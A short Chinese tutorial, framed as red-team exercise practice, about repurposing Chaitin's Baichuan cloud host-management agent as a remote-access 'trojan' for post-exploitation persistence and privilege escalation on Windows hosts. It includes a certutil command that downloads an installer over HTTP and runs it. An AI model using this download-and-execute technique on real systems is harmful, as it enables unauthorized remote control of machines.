实战攻防演练-利用长亭百川云平台上线远控提权

前言

长亭百川云平台是北京长亭未来科技有限公司旗下的 SaaS 产品服务平台，专注于云安全解决方案。其提供牧云·主机管理助手、网站监测、牧云·云原生安全平台、雷池 Web 应用防火墙等一系列在线安全产品，帮助企业用户更轻松地治理云安全问题，使云上业务更加安全可靠。在使用中发现该产品可以用于攻防对抗中实战，其生成的客户端可是远程上线，获取到服务器主机任意权限，最后会提升至系统权限，适用于后渗透权限提升维持。

实战演示

网站地址:https://rivers.chaitin.cn
在开始使用长亭百川云服务之前，需要先注册一个百川云账号。有账号后可以在百川云登录

选择进入工作台，选择牧云主机管理助手

其中这里区分三个版本，基础版，体验版，付费版，具体如下所示，掏钱的肯定比不掏好用，看个人情况选择。

Windows上线木马

这里如下所示，windows主机需要浏览器下载后，使用其他命令运行

这里首先下载木马文件后上传至自己的网站服务器，使用certutil命令下载执行
certutil -urlcache -split -f http://127.0.0.1/installer.exe c:\installer.exe && start installer.exe
或者直接上传目标服务器运行 start installer.exe